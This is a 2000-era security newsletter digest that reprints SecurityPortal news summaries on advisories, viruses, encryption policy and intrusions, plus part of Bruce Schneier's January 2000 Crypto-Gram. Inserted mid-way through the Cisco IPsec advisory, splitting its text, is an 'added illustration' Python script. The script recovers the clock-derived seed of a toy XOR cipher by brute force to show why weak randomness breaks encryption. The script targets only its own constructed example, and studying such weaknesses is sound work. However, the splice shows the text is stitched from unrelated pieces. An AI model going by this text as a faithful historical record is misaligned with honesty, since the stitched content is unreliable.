Microsoft Bulletin: Malformed Conversion Data Vulnerability - Microsoft has released a patch that eliminates a security vulnerability in a utility that converts Japanese, Korean and Chinese Microsoft Word 5 documents to more-recent formats. A patch is available for the buffer overflow problem

Computer Currents: Symantec Gets Anti Virus Patent - Symantec has announced that a key technology in its Striker anti-virus engine has been granted patent rights by the US Patent and Trademark office. The firm said that the next-generation technology enables the Striker engine to detect complex polymorphic, or self-mutating, viruses much more rapidly than traditional anti-virus engines

Wired: Clinton Favors Computer Snooping - The Clinton administration wants to be able to send federal agents armed with search warrants into homes to copy encryption keys and implant secret back doors onto computers

Computer Currents: Encryption Challenge Beaten - A 56-bit security challenge laid down by CS Communication & Systemes in March, 1999, has been cracked in just two months by a team of students working with no less than 38,000 Internet users around the world

TechWeb: Washington Rep: Encryption Rules Need Work - interview with Rep. Bob Goodlatte. "We think it is almost, but not quite, a 180-degree turn from [previous policy]," Goodlatte said. "But the problem is the implementation of it. They've made the application process [for encryption export] complex and cumbersome."
The Fastest Growing Crime in America: Identity Theft - One of the nation's fastest-growing crimes is identity theft. Using a variety of methods, criminals obtain key pieces of a person's identity and fraudulently use that information for various illegal reasons. Some law enforcement officials estimate about 3,000 cases of identity theft a day within the United States

Jan 19, 2000

InformationWeek: Security Vendors Intro Wireless Tools - With the ongoing convergence of Internet and wireless devices such as cell phones and personal digital assistants, there's heightened awareness of security issues among vendors and customers. At the RSA 2000 Security Convention in San Jose, Calif., this week, vendors addressed the issue with a variety of new products and alliances

InformationWeek: Cisco To Acquire Two VPN Vendors - Looking to give users options for building virtual private networks, Cisco Systems today disclosed plans to supplement its product portfolio by buying VPN vendors Altiga Networks and Compatible Systems for a combined 567 million in stock

Canoe: Dodging a hack attack - Just how safe is your data on the Net? The stories are scary: Just before Christmas, a 14-year-old kid was arrested in Toronto after hacking a company's site and changing the passwords. He was arrested when he showed up to collect his $5,000 ransom. A couple of weeks later, a Russian hacker, 'Maxim,' held 300,000 credit card numbers hostage, demanding CDUniverse pay him US$100,000. To make good on his threat, he started posting the information publicly. So far, CDUniverse hasn't paid. And Monday, computer hackers vandalized the 'Thomas' Web site of the U.S. Library of Congress

NAI: W32/Ska2K.worm virus, Risk Low - This edition of the worm is only a minor variation of the original first identified in February 1999. This worm is detected with current DAT files. The file may be received by email with a size of 10,000 bytes. The worm, if run, will patch WSOCK32.DLL to promote distribution by email on the host system if the email application supports SMTP email communication. If the host supports this environment, emails when sent from the host will be followed by a second message with the worm either attached or included as MIME

TechWeb: Zero Knowledge Hires Open Source Guru - Mike Shaver, who headed developer relations for the Mozilla.org project, is joining Zero-Knowledge Systems, a Montreal company rolling out an identity-cloaking Internet service

Kurt's Closet: SuSE Linux - a vendor gets security conscious - a look at the built in security features of SuSE Linux, including an interview with SuSE security maven Marc Heuse

MSNBC: "Smurf Attack" snarls web service in Seattle over the weekend - A "smurf" attack or series of attacks on an Internet service provider snarled World Wide Web traffic in as much as 70 percent of the region last weekend, operators of the service say. See http://securityportal.com/cover/coverstory19990531.html to learn about Smurf Amplifier Attacks

Jan 18, 2000

Response: Some thoughts on (network) intrusion detection systems - Kurt Seifried responds to the article featured prominently at Linux Today questioning his analysis of the shortcomings of network-based intrusion detection. (How much confidence do you have in your ID tools?)

Sophos: Guidelines for Safe Hex - As well as keeping your anti-virus software up to date there are other ways in which you can reduce the chances of virus infection inside your company. We list some of the guidelines you might like to consider for safer computing in your organisation

TechnologyPost: Hackers target Visa, other big firms - Visa International has confirmed British press reports at the weekend that its global network was sniffed by hackers or similar people unknown last summer, but that its security systems locked down the on-line sessions before any systems break-ins occurred

Wired: Online Security Remains Elusive - As e-business lights up the Web, the critical matter of data security is headed for center stage. There have been too many security failures in the past and it's going to get worse, said Paul Kocher, president and chief scientist for Cryptography Research

FoxNews: Artificial Immunology - Protection and recovery efforts from hack attacks and viruses account for 2.5 percent - or 25 billion - of global spending on information technology each year. The costs are so high mainly due to labor-intensive data recovery and productivity loss from downed systems

Sophos: WM97/Marker-BU a Word 97 macro virus - WM97/Marker-BU is a variant of Marker-R with various changes, and has been seen in the wild. If the date is between 23rd and 31st of July the virus changes the Application.Caption from Microsoft Word to Happy Birthday Shankar-25th July. The world may Forget but not me. It then displays a message box asking Did You curse Shankar on his Birthday? If you answer Yes another message box appears saying Thank You! I love you. are u free tonight? However, if you click No a message box appears saying You are Heart Less.
The virus then makes changes to the document summary TechWeb: Entrust Launches Security Outsourcing - Entrust, a provider of public key infrastructure and digital certificate security applications, on Monday unveiled plans to provide outsourced security services for business-to-business and business-to-consumer transactions, and said it has partnered with Cash Tax to host the service InfoWorld: Panelists debate the issues surrounding cryptography - Issues including ease of use, governmental regulations, and wireless systems will be at the forefront of the cryptography realm in upcoming years, a panel of specialists said Monday at the RSA Conference 2000 show. The panelists, with affiliations ranging from the Massachusetts Institute of Technology to Sun Microsystems, urged that a variety of actions be taken by the industry Wired: 56 a Bit Short of Secure - The collective crackers of Distributed.net have knocked off another 56-bit encryption key, this time in just over two months InfoWorld: Verisign aims to secure wireless transactions - At the RSA Conference 2000 show here on Monday, VeriSign unveiled a set of technologies, services, and alliances to promote trusted, wireless Internet commerce. Citing the growth in usage of wireless devices, VeriSign Vice President of Worldwide Marketing Richard Yanowitch said that the initiative is intended to provide a complete trust infrastructure to the wireless world PCWorld: The Web Is a Hacker's Playground - Can the Net be crime-proofed? Not as long as there are sloppy programmers and clever cat burglars Microsoft Bulletin: Malformed RTF Control Word - The control information is specified via directives called control words. The default RTF reader that ships as part of many Windows platforms has an unchecked buffer in the portion of the reader that parses control words. If an RTF file contains a specially-malformed control word, it could cause the application to crash. 
A patch is available for this vulnerability, which can causes a Denial of Service condition in all Microsoft Operating Systems Jan 17, 2000 FCW: NSA grapples with Linux security - The National Security Agency, the super-secret arm of the Defense Department responsible for signals intelligence and information systems security, last week tapped Secure Computing Corp. to develop a secure version of the Linux operating system IDG: Film studios bring claim against DVD hackers - Eight major motion picture companies late last week filed injunction complaints in U.S. Federal Court against three alleged hackers to prevent them from publishing an unauthorized DVD de-encryption program on their Web sites ******* What's new with SecurityPortal.com ******* The Unbreakable Cipher: Why Not Just Stay With Perfection? John Savard gets under the covers of ciphers to explain why the market uses DES and RSA algorithms instead of the "perfect" cipher. Read the full story here. Tell us how we are doing. Send any other questions or comments to webmaster@securityportal.com . Jim Reavis SecurityPortal.com - The focal point for security on the Net jreavis@SecurityPortal.com @HWA 18.0 Security Portal Review Jan 31st ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ******* Vendor Corner ******* Sponsored by VeriSign - The Internet Trust Company Protect your servers with 128-bit SSL encryption today! Get VeriSign's FREE guide, "Securing Your Web Site for Business". It tells you everything you need to know about using SSL to encrypt your e-commerce transactions for serious online security. Click here! http://www.verisign.com/cgi-bin/go.cgi?a=n016001690008000 ******* What's new with SecurityPortal.com ******* Information Warfare As the latest buzzword to succeed Y2K on the media's "terror throne," information warfare (IW), as a useful term, begs for realistic definition. No doubt, bin Laden can attack us. 
Graduate students at Cal Tech, MIT, or UCLA and tenth-graders at your local high school can also launch "volleys" against corporate America. How effective such invasions would be is the critical issue. In the Gulf War, Iraqi anti-aircraft batteries expended vast rounds against allied planes, and it was almost totally ineffective. Sheer bulk doesn't always equate to victory. Read the full story here. A Practical Guide to Cryptography What is it, where do I get it and how do I use it? Kurt Seifried has developed a How-to for using cryptography with several operating systems. Find the guide here. ******* Vendor Corner ******* NOW from Entrust Technologies: All the power of proven Entrust solutions in a managed service. With Entrust@YourService, you're choosing: * the leader in bringing trust to e-business * a solution that will evolve with your e-business needs * a single, reliable trust backbone for all that you do Entrust@YourService is the choice for companies like yours that need to secure e-business quickly and reliably - without losing focus on what you do best. Click for more info: http://www.entrust.com/choice2 ******* Top News ******* January 31, 2000 Welcome to SecurityPortal.com - The focal point for security on the Net. Recent postings in our top news : Jan 31, 2000 ZDNet: What´s wrong with Microsoft security? - The term "Microsoft's latest security glitch" has become a cliche. But it didn't have to Jan 28, 2000 Wired: Fast, Simple ... and Vulnerable - A online bank's opening has been marred by a glitch that let customers transfer money from any U.S. bank account. Anyone who knew what they were doing could move funds to an X.com bank account and then withdraw them ZDNet: Win2000 security hole a 'major threat' - Six banks and three major PC makers affected by bug that lets attackers view files stored on Microsoft Index Server. Microsoft issues patch. 
CNN: DoubleClick suit filed - Woman accuses Net advertising firm of privacy violations.

TechWeb: Axent To Develop Linux Firewall With Cobalt - E-security vendor Axent Technologies Thursday unveiled a partnership with Cobalt Networks under which the companies will produce a Linux firewall and virtual private network appliance for small to midsize companies, branch offices, and service providers.

ComputerWorld: Congress backs federal efforts on Y2K, is wary on security - Fernando Burbano, the CIO at the U.S. Department of State, said federal agencies don't have the money to pursue critical infrastructure protection initiatives.

LinuxJournal: Crackers and Crackdowns - DeCSS author Jon Lech Johansen's home was raided by special police forces at the whim of the Motion Picture Association, an organization which affectionately refers to itself as "a little State Department".

Mercury Center: Student charged with hacking - A federal grand jury in San Jose on Wednesday indicted a former Princeton University student suspected of hacking into the computer system of a Palo Alto e-commerce company and stealing nearly 2,000 credit card numbers.

InternetNews: Hackers Close Japanese Government Sites - So far this week, hackers have made three successful attacks on the official Web sites of two Japanese government agencies, altering the agencies' homepages and possibly deleting government data.

ZDNet: Smart card 'inventor' lands in jail - Serge Humpich says he wasn't really stealing subway tokens -- just testing his new invention. It could cost him seven years.

Jan 27, 2000

Wired: U.S. to Push China on Encryption - The United States will press China to explain new regulations on encryption technology at a meeting of economic leaders in Davos, Switzerland, U.S. Trade Representative Charlene Barshefsky said Thursday.

TheRegister: New hack attack is greater threat than imagined - It was news a month ago; days later it vanished. The mainstream press may have forgotten it, but security specialists gathered in California last week for the sixth RSA Conference to consider the growing trend in malicious computer assaults called distributed denial of service (DDoS) attacks. Dealing with this sort of assault can be maddening for the primary victim. The clients from which the attack is launched are themselves intermediate victims who rarely know that their systems have been compromised. They are in diverse locations around the world, administered by people who speak different languages, making it nearly impossible for one victim to explain to another how to cope with the threat.

ZDNet: Does DoubleClick track too closely? - Many e-shoppers don't realize that companies like DoubleClick's Abacus Direct pick up your trail at one of their sites and follow it wherever you go.

vnunet: Visa strengthens network after number kidnap - Last week a Visa spokesman admitted that hackers had penetrated its computer network last July, but stressed that they were detected almost immediately. The company has since hardened its systems and the hackers have not returned, he said.

TheRegister: New crypto technique beats current standard - Called Cipherunicorn-A, the technique creates a number of false keys in addition to the true encryption key, making it more difficult for potential intruders to crack. The approach should increase security while remaining compliant with the Data Encryption Standard (DES) introduced by the US Department of Commerce, a company spokesperson told The Register.

CNet: Corel hurries to fix Linux security hole - Corel is working to patch a bug in its version of Linux that could let unauthorized users gain access to machines running Corel Linux, via a program called Corel Update.

ZDNet: Bernstein crypto case to be reheard - A U.S. Appeals Court panel will reconsider an earlier ruling striking down export limits on computer data scrambling products in light of new export rules announced this month by the White House.

Microsoft Bulletin: Index Server - This patch eliminates two vulnerabilities whose only relationship is that both occur in Index Server. The first is the "Malformed Hit-Highlighting Argument" vulnerability. The second vulnerability involves the error message that is returned when a user requests a non-existent Internet Data Query file.

SCO Security Advisories: rtpm, scohelp - Patches are available for buffer overflow vulnerabilities in rtpm and scohelp.

CNN: Security improvements made at national labs - Security at nuclear weapons labs has made "monumental strides" in the past year, but computer protection is still not 100 percent, the Energy Department's top security official says.

Jan 26, 2000

Wired: Echelon 'Proof' Discovered - References to a project Echelon have been found for the first time in declassified National Security Agency documents, says the researcher who found them. The researcher claims there is no evidence of misuse of the system.

Industry Standard: China Installs Net Secrecy Rules - China clamped new controls onto the Internet on Wednesday to stop Web sites from "leaking state secrets," and an official newspaper said curbs on news content were on the way.

BBC: Old computer viruses still bite - An analysis of the most common computer viruses of 1999 shows that although the threat of new self-propagating viruses is growing, older viruses are still very common. One boot sector virus, Form, is nearly a decade old but still appears in the top ten.

FCW: Clinton aides fight for cybersecurity bill - Senior Clinton administration officials are urging Congress to support a bill that would provide a defense against criminals who now have access to more secure communications thanks to new encryption export regulations released this month.

ZDNet: Scam tricks users into 'stealing' - So just what do computer criminals do with stolen credit cards? How about tricking innocent electronics shoppers into stealing on their behalf? That's how at least one scam artist is playing the online credit card game, MSNBC has learned.

Why random numbers are important for security - Modern computer security requires some level of encryption to be applied to various kinds of data, for example secure web transactions or SSH. But something that often goes ignored is the fact that all good crypto relies on some degree of randomness, which, if not supplied properly, can lead to a significant loss in the strength of the encryption: a key is only as unpredictable as the source it was generated from.

Sophos: XM97/Divi-A Excel 97 macro virus - XM97/Divi-A is an Excel spreadsheet macro virus. It creates a file called BASE5874.XLS in the Excel template directory, and will infect other spreadsheets as they are opened or closed.

Caldera: Advisory number CSSA-1999-039.0, Various security problems with majordomo - There are several bugs in majordomo that allow arbitrary users to execute commands with the privileges of majordomo. If the sendmail aliases file contains aliases that invoke majordomo, a compromise of additional system accounts is possible, which may further lead to a root compromise. An immediate root exploit has not been found, however.

Jan 25, 2000

MontrealGazette: How safe is voice mail? - When Steven Boudrias was charged recently with infiltrating the Montreal Urban Community police department's voice-mail system, the question blinking alongside the message light on most people's phones was how safe electronic call-answering really is.

Intelligence Gathering on the Net - Prerequisites for computer security professionals include a knowledge of networking, scripting languages, operating systems, and security countermeasures. High-level technical savvy marks the true professional; such expertise, however, carries a practitioner only so far. An effective professional also listens for what's coming down the track.

Fairfax: Big keys unlock door to strong encryption - Australians will find it much easier to get strong cryptography protection for their on-line business activities following the United States Government's 14 January decision to liberalise its export restrictions.

HP Bulletin: Security Vulnerability with PMTU strategy - An HP-UX 10.30/11.00 system can be used as an IP traffic amplifier. Small amounts of inbound traffic can result in larger amounts of outbound traffic.

Sophos: WM97/Melissa-AK virus - WM97/Melissa-AK is a variant of WM97/Melissa. It will attempt to email a copy of the infected document to the first 50 entries in the Outlook address book. If the current day of the month is equal to the current minute it will insert the phrase "Symbytes Ver. 7.x mucking about..The Mahatma." into the active document.

Cisco: IPsec/CEF Software Defect on Route Switch Processors - On all RSP and RSM processors, when an interface in the router is configured with an IPSec crypto map and the switching mode is Cisco Express Forwarding (CEF), the RSP and RSM will restart when they attempt to decrypt IPSec packets.
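The item above on why random numbers matter is the one place in this digest that states a principle rather than reporting news, so here is an added illustration of it (example code written for this issue, not from the SecurityPortal article). A toy stream cipher XORs a message with output from Python's Mersenne Twister, which is not a cryptographic generator; when that generator is seeded from the clock, the whole keystream is fixed by a value an attacker can guess, and the "key" falls to trying every second in a plausible window. The same cipher driven by the operating system's CSPRNG has no such shortcut. The Unix timestamp, the HTTP request text and the one-hour search window are constructed for the example.

```python
"""Weak seeding versus a real entropy source: recovering a "random" key.

Added example, not code from the article. The cipher itself (XOR with a
keystream) is deliberately simple; the point is the keystream's source.
"""
import random
import secrets


def weak_keystream(seed: int, n: int) -> bytes:
    """Keystream completely determined by `seed` (deterministic PRNG)."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


def strong_keystream(n: int) -> bytes:
    """Keystream from the OS CSPRNG: there is no seed to brute-force."""
    return secrets.token_bytes(n)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def weak_encrypt(plaintext: bytes, send_time: int) -> bytes:
    """The mistake: seeding the generator from the clock (Unix seconds)."""
    return xor_bytes(plaintext, weak_keystream(send_time, len(plaintext)))


def recover_seed(ciphertext: bytes, known_prefix: bytes,
                 window_start: int, window_end: int):
    """Attacker model: knows a plaintext prefix (a protocol header is enough)
    and the approximate send time. Tries every candidate seed in the window
    and returns the one whose keystream reproduces the prefix, else None."""
    target = ciphertext[:len(known_prefix)]
    for seed in range(window_start, window_end + 1):
        if xor_bytes(target, weak_keystream(seed, len(known_prefix))) == known_prefix:
            return seed
    return None


def attack_demo() -> dict:
    """End to end: break the clock-seeded cipher, fail against the CSPRNG."""
    # Constructed sample: a request "sent" at a made-up Unix time in Feb 2000.
    send_time = 950_000_000
    message = b"GET /account HTTP/1.0\r\nAuthorization: Basic dXNlcjpzZWNyZXQ=\r\n"
    known_prefix = b"GET /account"  # any attacker can assume this much

    ct = weak_encrypt(message, send_time)
    # The attacker only knows the capture happened within one hour either side.
    lo, hi = send_time - 3600, send_time + 3600
    seed = recover_seed(ct, known_prefix, lo, hi)
    recovered = xor_bytes(ct, weak_keystream(seed, len(ct))) if seed is not None else None

    # Same cipher, properly keyed from the OS CSPRNG: the search finds nothing.
    ct_strong = xor_bytes(message, strong_keystream(len(message)))
    seed_strong = recover_seed(ct_strong, known_prefix, lo, hi)

    return {
        "candidates_tried": hi - lo + 1,
        "weak_seed_found": seed,
        "weak_plaintext": recovered,
        "strong_seed_found": seed_strong,
    }


if __name__ == "__main__":
    result = attack_demo()
    print("candidates tried :", result["candidates_tried"])
    print("weak seed found  :", result["weak_seed_found"])
    print("recovered text   :", result["weak_plaintext"])
    print("strong seed found:", result["strong_seed_found"])
```

The keystream looks random in both cases; what differs is the size of the space an attacker has to search. A clock-seeded generator turns a nominally 128-bit-plus keystream into a few thousand guesses, which is the "significant loss in strength" the item warns about. The fix is not a better cipher but a better source: take key material from the platform CSPRNG (here `secrets`, which wraps `os.urandom`) and never derive it from timestamps, process IDs or other values an observer can bound.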
A patch is not yet available; the workaround is to disable Cisco Express Forwarding.

Sunday Times: French spies listen in to British calls - French intelligence is intercepting British businessmen's GSM calls after investing millions in satellite technology for its listening stations.

Computer Currents: Cybercrime Harder to Prosecute - US Justice Department officials reportedly called computer crime a growing menace to corporations worldwide, and admitted that law enforcement agents face major hurdles in combating it.

ZDNet: Hackers impersonate AOL users - Teenage hackers are pretending to be AOL users, then coercing friends into divulging personal information.

Jan 24, 2000

ABCNews: Law Enforcement Is Rushing to Catch the Online Crime Wave - From Web site hackers to child pornographers, credit card thieves and e-mail terrorists, crime online is mushrooming, says Schwartz. And the crime fighters are struggling to catch up.

Wired: More Bad News for DVD Hackers - Judge William J. Elfving issued a preliminary injunction Friday ordering 21 defendants to stop posting code that breaks through the security software of DVDs to their Web sites.

Wired: Outpost Leaves Data Unguarded - While James Wynne was checking his online order Friday at Outpost.com, he noticed something curious -- he could check orders from other people, too.

Jim Reavis
SecurityPortal.com - The focal point for security on the Net
jreavis@SecurityPortal.com

@HWA

19.0 CRYPTOGRAM Jan 15th
~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: Bruce Schneier

CRYPTO-GRAM
January 15, 2000

by Bruce Schneier
Founder and CTO
Counterpane Internet Security, Inc.
schneier@counterpane.com
http://www.counterpane.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on computer security and cryptography.

Back issues are available at http://www.counterpane.com. To subscribe or unsubscribe, see below.

Copyright (c) 2000 by Bruce Schneier

** *** ***** ******* *********** *************

In this issue:
     "Key Finding" Attacks and Publicity Attacks
     Counterpane -- Featured Research
     News
     New U.S. Encryption Regulations
     Counterpane Internet Security News
     The Doghouse: Netscape
     Block and Stream Ciphers
     Comments from Readers

** *** ***** ******* *********** *************

"Key Finding" Attacks and Publicity Attacks

A couple of weeks ago the New York Times reported a new "key finding" attack. This was a follow-up to some research discussed here some months ago, showing how to search for, and find, public and private cryptographic keys in software because of their random bit patterns. The company nCipher demonstrated that someone who has access to a Web server that uses SSL can find the SSL private key using these techniques, and potentially steal it. nCipher's press release talked of "a significant vulnerability to today's Internet economy."

Huh? Why is this news? It's not the fact that the SSL private keys are on the Web server. That's obvious; they have to be there. It's not the fact that someone who has access to the Web server can potentially steal the private keys. That's obvious, too. It's not the news that a CGI attack can compromise data on a Web server. We've seen dozens of those attacks in 1999. Even the press release admits that "no information is known to have been compromised using a 'key-finding' attack." Neither nCipher nor the New York Times found anyone who was vulnerable.

But wait . . . nCipher sells a solution to this "problem." Okay, now I understand. I call this kind of thing a publicity attack.
It's a blatant attempt by nCipher to get some free publicity for their hardware encryption accelerators, and to scare e-commerce vendors into purchasing them. And people fall for this, again and again.

This kind of thing is happening more and more, and I'm getting tired of it. Here are some more examples:

* An employee of Cryptonym, a PKI vendor, announced that he found a variable with the prefix "NSA" inside Microsoft's cryptographic API. Based on absolutely zero evidence, this was held up as an example of NSA's manipulation of the Microsoft code.

* Some people at eEye discovered a bug in IIS last year, completely compromising the product. They contacted Microsoft, and after waiting only a week for them to acknowledge the problem, they issued a press release and a hacker tool. Microsoft rushed a fix out, but not as fast as the hackers jumped on the exploit. eEye sells vulnerability assessment tools and security consulting, by the way.

I'm a fan of full disclosure -- and definitely not a fan of Microsoft's security -- and believe that security vulnerabilities need to be publicized before they're fixed. (If you don't publicize, the vendors often don't bother fixing them.) But this practice of announcing "vulnerabilities" for the sole purpose of hyping your own solutions has got to stop.

Here are some examples of doing things right:

* The University of California Berkeley researchers have broken just about every digital cellphone security algorithm. They're not profiting from these breaks. They don't publish software packages that can listen in on cellphone calls. This is research, and good research.

* Georgi Guninski has found a huge number of JavaScript holes over the past year or so. Rather than posting scary exploits and cracking tools that script kiddies could take advantage of, and rather than trying to grab the limelight, he has been quietly publishing the problems and available workarounds. Of course, the downside is that these bugs get less attention from Microsoft and Netscape, even though they are as serious as many others that have received more press attention and thus get fixed quickly by the browser makers. Nonetheless, this is good research.

* The L0pht has done an enormous amount of good by exposing Windows NT security problems, and they don't try to sell products to fix the problems. (Although now that they've formed a VC-funded security consulting company, @Stake, they're going to have to tread more carefully.)

* Perfecto markets security against CGI attacks. Although they try to increase awareness of the risks, they don't go around writing new CGI exploits and publicizing them. They point to other CGI exploits, done by hackers with no affiliation to the company, as examples of the problem.

* Steve Bellovin at AT&T Labs found a serious hole in the Internet DNS system. He delayed publication of this vulnerability for years because there was no readily available fix.

How do you tell the difference? Look at the messenger. Who found the vulnerability? What was their motivation for publicizing? The nCipher announcement came with a Business Wire press release, and a PR agent who touted the story to reporters. These things are not cheap -- the press release alone cost over $1000 -- and should be an obvious tip-off that other interests are at stake.

Also, look critically at the exploit. Is it really something new, or is it something old rehashed? Does it expose a vulnerability that matters, or one that doesn't? Is it actually interesting? If it's old, doesn't matter, and is uninteresting, it's probably just an attempt at press coverage.

And look at how it is released. The nCipher release included a hacker tool. As the New York Times pointed out, "thus making e-commerce sites more vulnerable to attack and more likely to buy nCipher's product." Announcements packaged with hacker tools are more likely to be part of the problem than part of the solution.
I am a firm believer in open source security, and in publishing security vulnerabilities. I don't want the digital cellphone industry, or the DVD industry, to foist bad security off on consumers. I think the quality of security products should be tested just as the quality of automobiles is tested. But remember that security testing is difficult and time-consuming, and that many of the "testers" have ulterior motives. These motives are often just as much news as the vulnerability itself, and sometimes the announcements are more properly ignored as blatant self-serving publicity.

The NY Times URLs using their search function change daily, but you can go to http://search.nytimes.com/plweb-cgi/ and use the Extended Search; the article title is "Attacks on Encryption Code Raise Questions About Computer Vulnerability".

nCipher's press release:
http://www.ncipher.com/news/files/press/2000/vulnerable.html

nCipher's white paper (Acrobat format):
http://www.ncipher.com/products/files/papers/pcsws/pcsws.pdf

** *** ***** ******* *********** *************

Counterpane -- Featured Research

"A Cryptographic Evaluation of IPsec"
N. Ferguson and B. Schneier, to appear

We perform a cryptographic review of the IPsec protocol, as described in the November 1998 RFCs. Even though the protocol is a disappointment -- our primary complaint is with its complexity -- it is the best IP security protocol available at the moment.
http://www.counterpane.com/ipsec.html

** *** ***** ******* *********** *************

News

You can vote via the Internet in the Arizona Democratic primary. Does anyone other than me think this is terrifying?
http://dailynews.yahoo.com/h/nm/19991217/wr/arizona_election_1.html

An expert at the British government's computer security headquarters has endorsed open-source solutions as the most secure computer architecture available:
http://212.187.198.142/news/1999/50/ns-12266.html

The DVD Copy Control Association is pissed, and they're suing everyone in sight.
http://www.cnn.com/1999/TECH/ptech/12/28/dvd.crack/

Moore's Law and its effects on cryptography:
http://www.newscientist.com/ns/20000108/newsstory2.html

Information warfare in the Information Age:
http://www.cnn.com/1999/TECH/computing/12/30/info.war.idg/index.html
http://www.it.fairfax.com.au/industry/19991227/A59706-1999Dec27.html

Radio pirates: In the U.K., some radios can receive a digital signal that causes them to automatically switch to stations playing traffic reports. Hackers have figured out how to spoof the signal, forcing the radio to always tune to a particular station. Good illustration of the hidden vulnerabilities in digital systems.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_592000/592972.stm
http://uk.news.yahoo.com/000106/18/d6jt.html

Well, this sure is inaccurate:
http://www.lancrypto.com/algorithms_e.htm

Some months ago I mentioned the Y2K notice from Hart Scientific. They now have a sequel:
http://www.hartscientific.com/y2k-2.htm

RSA "digital vault" software:
http://news.excite.com/news/pr/000111/ma-rsa-keon-software

E-commerce encryption glitch; a good example of why people are the worst security problem. A programmer just forgot to reactivate the encryption.
http://news.excite.com/news/r/000107/17/news-news-airlines-northwest

Become an instant cryptography portal. Encryption.com, encryption2000.com, and 1-800-ENCRYPT are for sale.
http://news.excite.com/news/bw/000111/wa-azalea-software
http://www.encryption.com

Mail encryption utility that lets you take back messages you regret sending. Does anyone believe that this is secure?
http://www.zdnet.com:80/anchordesk/story/story_4323.html

Human GPS implants:
http://www.newscientist.com/ns/20000108/newsstory8.html

Clinton's hacker scholarships:
http://chronicle.com/free/2000/01/2000011001t.htm

Microsoft is building a VPN into Windows 2000. Whose tunnel do you want to hack today?
http://www.networkworld.com/news/2000/0110vpn.html

Someone stole a bunch of credit card numbers from CD Universe, tried extortion, then posted some:
http://www.wired.com/news/technology/0,1282,33563,00.html
http://www.msnbc.com/news/355593.asp
and CyberCash's reaction (with a nice quote about how impregnable their product's security is; way to wave a red flag at the hackers):
http://www.internetnews.com/ec-news/article/0,1087,4_279541,00.html

An interesting three-part article about video surveillance and its effect on society:
http://www.villagevoice.com/issues/9840/boal.shtml

The system used to fund a series of anti-Bush commercials loosely resembles my "street performer protocol," using the credit card company instead of a publisher as a trusted third party. They validate your card when you pledge, but only charge it if they get enough to run an ad:
http://www.gwbush.com/
Street performer protocol:
http://www.counterpane.com/street_performer.html

You can steal subway rides on the NY City system by folding the Metrocard at precisely the right point. The Village Voice and NY Times ran stories about it, but those are no longer available, at least for free. There's a copy of the NYTimes story here:
http://www.monkey.org/geeks/archive/9801/msg00052.html
The 2600 "Off the Hook" RealAudio for 2/3/98 talks about it, starting around 54:35. The RealAudio is linked from here:
http://www.2600.com/offthehook/1998/0298.html

The White House released a national plan to protect America's computer systems from unauthorized intrusions. This plan includes the establishment of the controversial Federal Intrusion Detection Network (FIDNET), which would monitor activity on government computer systems. (So far, there are no plans to monitor commercial systems, but that can change. The government does want to involve industry in this.) The plan also calls for the establishment of an "Institute for Information Infrastructure Protection" and a new program that will offer college scholarships to students in the field of computer security in exchange for public service commitments. The scholarship program seems like a good idea; we need more computer security experts.
http://www.thestandard.com/article/display/0,1151,8661,00.html
http://dailynews.yahoo.com/h/ap/20000107/ts/clinton_cyber_terrorism_4.html
http://news.excite.com/news/ap/000107/01/tech-clinton-cyber-terrorism
http://www.msnbc.com/news/355783.asp
http://www.computerworld.com/home/print.nsf/all/000107DB3A
EPIC analysis:
http://www.epic.org/security/CIP/
White House plan (PDF):
http://www.whitehouse.gov/WH/EOP/NSC/html/documents/npisp-execsummary-000105.pdf
White House press release:
http://www.epic.org/security/CIP/WH_pr_1_7_00.html
White House press briefing:
http://www.epic.org/security/CIP/WH_briefing_1_7_00.html

** *** ***** ******* *********** *************

New U.S. Encryption Regulations

We have some, and they're a big improvement. On the plus side, "retail" encryption products -- like browsers, e-mail programs, or PGP -- will be widely exportable to all but a few countries "regardless of key length or algorithm." On the minus side, the new regulations are complex (an unending stream of work for the lawyers) and will still make it difficult for many people to freely exchange encryption products. They also do not address the Constitutional free speech concerns raised by encryption export controls.

Major features of the new regs:

* "Retail" encryption products are exportable, regardless of key length or algorithm, to all but the designated "T-7" terrorist nations. In order to export you need to fill out paperwork. You need to get a retail classification, submit your product to a one-time technical review, and submit periodic reports of whom products are shipped to (but not necessarily report end users).
* Export of encryption products up to 64 bits in key length is completely liberalized. * "Non-retail" products will require a license for many exports, such as to foreign governments or foreign ISPs and telcos under certain circumstances. * Source code that is "not subject to an express agreement for the payment of a licensing fee or royalty for commercial production or sale of any product developed with the source code" is freely exportable to all but the T-7 terrorist countries. Source code exporters are required to send the Department of Commerce a copy of the code, or a URL, upon publication. Note that posting code on a web site for anonymous download is allowed; you are not required to check that downloaders might be from one of the prohibited countries. One obvious question is: "How does this affect the Bernstein and Karn court cases?" I don't know yet. The free speech concerns are not addressed, but the things that Bernstein and Karn wanted to do are now allowed. We'll have to see what the attorneys think. A more personal question is: "How does this affect the Applied Cryptography source code disks?" Near as I can tell, all I have to do is notify the right people and I can export them. I will do so as soon as I can. Stay tuned. 
The actual regs (legalese): http://www.eff.com/pub/Privacy/ITAR_export/2000_export_policy/20000112_crypt oexport_regs.html EFF's press release: http://www.eff.com/11300_crypto_release.html Reuters story with BSA and Sun reactions: http://news.excite.com/news/r/000112/19/tech-tech-encryption Reuters story with EFF reaction: http://news.excite.com/news/r/000113/13/tech-tech-encryption AEA reaction press release: http://news.excite.com/news/pr/000112/dc-aea-encryption-reg ACLU and EPIC reaction: http://news.excite.com/news/zd/000113/18/crypto-compromise-a ** *** ***** ******* *********** ************* Counterpane Internet Security News Bruce Schneier profiled in Business Week: http://businessweek.com/cgi-bin/ebiz/ebiz_frame.pl?url=/ebiz/9912/em1229.htm Bruce Schneier is speaking at BlackHat in Singapore, 3-4 April 2000. He'll also be at BlackHat and DefCon in Las Vegas. http://www.blackhat.org http://www.defcon.org Bruce Schneier is speaking at the RSA Conference in San Jose: Tuesday, 18 Jan, 2:00 PM, on the Analyst's Track. I don't know if it made it into the program, but Bruce will be on stage with Matt Blaze, Steve Bellovin, and several other really smart people. ** *** ***** ******* *********** ************* The Doghouse: Netscape Netscape encrypts users' e-mail passwords with a lousy algorithm. If this isn't enough, their comments to the press cement their inclusion in the doghouse: "Chris Saito, the senior director for product management at Netscape, said that the 